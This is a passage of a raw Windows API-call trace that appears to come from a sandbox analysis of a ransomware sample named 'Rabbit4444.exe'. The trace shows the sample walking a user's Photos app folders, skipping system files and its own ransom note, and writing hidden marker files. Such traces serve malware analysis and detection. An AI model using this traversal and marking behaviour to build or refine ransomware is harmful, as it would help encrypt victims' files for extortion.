(lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe") returned 77 [0065.460] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.460] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xecaaa968, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf056ed41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0065.460] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.461] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.461] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.461] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.461] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xecaaa968, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf056ed41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.461] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.461] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.461] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.461] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.461] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.461] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf056ed41, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf056ed41, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf056ed41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.461] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.461] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.461] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x37484b36, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x37484b36, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.461] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0065.461] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0065.461] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0065.461] lstrcpyW (in: lpString1=0x130ebd4, lpString2="AC" | out: lpString1="AC") returned="AC" [0065.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0065.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x1182e8 [0065.461] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x11cfc8 [0065.461] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e912c2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fd05db4, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0065.461] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.461] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.461] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0065.462] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0065.462] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0065.462] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0065.462] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0065.462] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0065.462] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0065.462] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0065.462] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0065.462] lstrcpyW (in: lpString1=0x130ebd4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0065.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0065.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123eb8 [0065.462] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x1222e8 [0065.462] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e919b3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fd05db4, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0065.462] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0065.462] lstrcpyW (in: lpString1=0x130ebd4, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0065.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0065.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x122f00 [0065.462] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122188 [0065.462] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x32a78e7c, ftLastAccessTime.dwHighDateTime=0x1d32756, ftLastWriteTime.dwLowDateTime=0x32a78e7c, ftLastWriteTime.dwHighDateTime=0x1d32756, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0065.462] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.462] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.462] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0065.462] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0065.462] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0065.462] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0065.463] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0065.463] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0065.463] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0065.463] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0065.463] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0065.463] lstrcpyW (in: lpString1=0x130ebd4, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0065.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0065.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123440 [0065.463] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122108 [0065.463] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0ee0b1c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fcdfb62, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0065.463] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0065.463] lstrcpyW (in: lpString1=0x130ebd4, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0065.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0065.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x122b40 [0065.463] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122288 [0065.463] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x712f2959, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0065.463] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0065.464] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0065.464] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0065.464] lstrcpyW (in: lpString1=0x130ebd4, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0065.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0065.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x124250 [0065.464] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x122128 [0065.464] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec8930d8, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xec8930d8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xec8930d8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0065.464] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0065.464] lstrcpyW (in: lpString1=0x130ebd4, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0065.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0065.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x122900 [0065.464] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122068 [0065.464] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x36142cad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x36142cad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0065.464] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0065.464] lstrcpyW (in: lpString1=0x130ebd4, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0065.465] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0065.465] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x123a68 [0065.465] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x121f88 [0065.465] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x36142cad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x36142cad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0065.465] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0065.465] lstrcpyW (in: lpString1=0x130ebd4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.465] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.466] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.466] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.466] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.466] CloseHandle (hObject=0x2cc) returned 1 [0065.466] CloseHandle (hObject=0x2a0) returned 1 [0065.467] GetCurrentThreadId () returned 0xd98 [0065.467] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0065.467] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState" [0065.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123a68 | out: hHeap=0xe0000) returned 1 [0065.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0065.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState" [0065.467] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\" [0065.467] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0065.467] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.469] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.471] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.472] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.472] CloseHandle (hObject=0x2a0) returned 1 [0065.472] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState") returned 87 [0065.472] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.473] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x36142cad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf0594f9d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0065.473] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.473] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.473] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.473] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.473] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x36142cad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf0594f9d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.473] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.473] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.473] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.473] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.473] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.473] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0594f9d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0594f9d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0594f9d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.473] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.473] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.473] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0594f9d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0594f9d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0594f9d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.473] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0065.473] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.473] CreateFileW 